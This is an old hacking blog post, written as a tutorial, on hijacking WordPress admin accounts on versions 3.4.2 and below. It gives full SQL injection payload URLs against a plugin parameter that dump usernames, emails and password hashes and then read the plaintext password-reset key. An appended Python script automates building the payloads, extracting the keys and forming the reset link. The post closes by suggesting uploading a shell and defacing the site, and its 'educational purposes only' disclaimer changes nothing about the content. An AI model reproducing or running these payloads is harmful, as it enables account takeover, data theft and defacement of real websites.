Saturday, 27 April 2013

Hacking Wordpress without hash cracking

Hey puntos, today I am back with a new post for you. This post is about hacking WordPress blogs without cracking their password hashes.

As you probably know, WordPress now hashes user passwords with a salted, iterated algorithm (phpass), so the hashes in wp_users.user_pass are not easy to recover. The only way to get a password out of one of those hashes is brute force, and brute force takes far too long.


Now let's get started--->

Things you need --->

1. A WordPress install at version 3.4.2 or below (see the note at the end: what actually matters is that the password reset key sits in the database in plaintext).
2. An SQL injection in that site (a vulnerable plugin parameter is the usual source; the example below uses one). Make sure the site's version is 3.4.2 or less.

Let's start --->

Find an SQL injection in the target WordPress site. The one I had looked like this (the injectable parameter comes from a plugin, not from WordPress core):
www.site.com?fbconnect_action=myhome&fbuserid=1

Now append this payload to the vulnerable URL. The column count (12 here) and the column that gets reflected in the page (6 here) depend on the vulnerable query, so work them out first with ORDER BY or UNION SELECT probing, and make sure the payload carries no invisible characters from copy and paste (a stray zero-width space inside a column name makes MySQL fail on an unknown column):
+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,0x3a,user_pass),7,8,9,10,11,12+from+wp_users--
The address will now look like this:
http://target.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,0x3a,user_pass),7,8,9,10,11,12+from+wp_users--
The reflected column now shows username:email:hash for the users in wp_users. Let's start pwning.

First go to http://target.com/wp-login.php and click "Lost your password?".

WordPress will ask for a username or e-mail address; enter the username (or e-mail) you pulled out with the injection and click "Get New Password".

It will then say "Check your e-mail for the confirmation link."
What WordPress does at this point is generate a random 20-character key, store it in plaintext in the user_activation_key column of wp_users, and e-mail the user a reset link that contains the same key.

We never see that e-mail, but we can read the key straight out of the database with the same injection; that is the whole trick. Each new reset request overwrites the stored key, so do the extraction right after requesting the reset.

Swap user_activation_key into the concat to extract it:
http://target/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activation_key),7,8,9,10,11,12+from+wp_users--
The reflected column now shows username:key (an empty key means no reset is pending for that user).

Finally, open the reset page on the site with your key and the username filled in:

wp-login.php?action=rp&key=KEYHERE&login=USERNAMEHERE

e.g.:
http://target.com/wp-login.php?action=rp&key=cFn9vDsT3X2ZnW8vEda6&login=admin
WordPress checks the key against the one stored in user_activation_key and, since they match, asks you for a new password. Enter the password you want and click "Reset Password".

Now you can log in to the site with that password.
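The whole procedure above (build the UNION payload, pull username:key out of the reflected column, assemble the reset link) as an added Python example; this is not code from the original post. The base URL target.com, the 12-column layout with column 6 reflected, the fbconnect parameter as the injection point, the HTML snippets standing in for server responses and the phpass hash in them are all constructed for the demo, and nothing here talks to a network.

```python
# Added example, not from the original post. Offline walkthrough of the
# plaintext-reset-key technique: payload construction, parsing of the
# reflected column, and the wp-login.php?action=rp link.
import re
from typing import List, Optional, Tuple
from urllib.parse import urlencode, urljoin

# Zero-width characters that creep into payloads via copy and paste.
INVISIBLE = "\u200b\u200c\u200d\ufeff"


def strip_invisible(s: str) -> str:
    """Drop zero-width chars; a U+200B inside 'user_activation_key' makes
    MySQL see an unknown column and the injection silently returns nothing."""
    return s.translate({ord(c): None for c in INVISIBLE})


def mysql_concat(*fields: str) -> str:
    """concat(a,0x3a,b,...): 0x3a is ':' as a hex literal, so no quotes are needed."""
    return "concat(" + ",0x3a,".join(fields) + ")"


def union_payload(columns: int, reflected: int, expr: str, table: str) -> str:
    """'and 1=2 union select ...' tail in the post's form: placeholders 1..N with
    `expr` in the column the page reflects. Spaces are '+' as in a query string."""
    if not 1 <= reflected <= columns:
        raise ValueError("reflected column must lie within the column count")
    cols = [str(i) for i in range(1, columns + 1)]
    cols[reflected - 1] = expr
    return strip_invisible(f"+and+1=2+union+select+{','.join(cols)}+from+{table}--")


def injection_url(base: str, expr: str, columns: int = 12, reflected: int = 6) -> str:
    """Full URL for the vulnerable plugin parameter used in the post (assumed layout)."""
    return (f"{base.rstrip('/')}/?fbconnect_action=myhome&fbuserid=1"
            + union_payload(columns, reflected, expr, "wp_users"))


# user_login:user_email:user_pass, user_pass being a phpass hash ($P$ + 31 chars).
USER_ROW = re.compile(r"([A-Za-z0-9_.\-@]+):([^:\s<>]+@[^:\s<>]+):(\$P\$[./0-9A-Za-z]{31})")
# user_login:user_activation_key; the key is 20 alphanumerics (wp_generate_password(20, false)).
KEY_ROW = re.compile(r"([A-Za-z0-9_.\-@]+):([A-Za-z0-9]{20})(?![A-Za-z0-9])")


def extract_users(html: str) -> List[Tuple[str, str, str]]:
    """(login, email, hash) triples found in the reflected column."""
    return USER_ROW.findall(html)


def extract_activation_key(html: str) -> Optional[Tuple[str, str]]:
    """(login, key), or None when the column is empty because no reset is pending."""
    m = KEY_ROW.search(html)
    return (m.group(1), m.group(2)) if m else None


def reset_url(base: str, key: str, login: str) -> str:
    """The wp-login.php?action=rp link WordPress would have e-mailed to the victim."""
    return urljoin(base, "wp-login.php") + "?" + urlencode({"action": "rp", "key": key, "login": login})


# Constructed responses standing in for what the reflected column would show.
STEP1_HTML = '<div class="home">admin:admin@target.com:$P$BqH7tAzcfzQp5sJ8DLwA5M/0hc93fk.</div>'
STEP2_BEFORE = '<div class="home">admin:</div>'                      # no reset requested yet
STEP2_AFTER = '<div class="home">admin:cFn9vDsT3X2ZnW8vEda6</div>'  # after "Lost your password?"


def walkthrough(base: str = "http://target.com/") -> dict:
    """Run the three steps against the constructed responses and return the artefacts."""
    users = extract_users(STEP1_HTML)
    login = users[0][0]
    pending = extract_activation_key(STEP2_AFTER)
    return {
        "dump_url": injection_url(base, mysql_concat("user_login", "user_email", "user_pass")),
        "key_url": injection_url(base, mysql_concat("user_login", "user_activation_key")),
        "login": login,
        "key": pending[1] if pending else None,
        "reset_url": reset_url(base, pending[1], login) if pending else None,
    }


if __name__ == "__main__":
    for name, value in walkthrough().items():
        print(f"{name}: {value}")
```

Against a live target the only change is fetching the two injection URLs over HTTP and feeding the response bodies to extract_users and extract_activation_key. The key regex relies on two things that hold for the versions the post targets: the default 20-character alphanumeric key, and the column holding it in plaintext; once the column holds a hash, what you read out is useless for the rp link.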

From here you can upload a shell and deface the site.

Note -->
1. For educational purposes only.
2. This works on WordPress 3.4.2 and earlier, and more generally on any release that still stores the reset key in plaintext in user_activation_key. From WordPress 4.3 onwards the stored key is hashed, so reading the column no longer gives you a key that the rp link will accept.
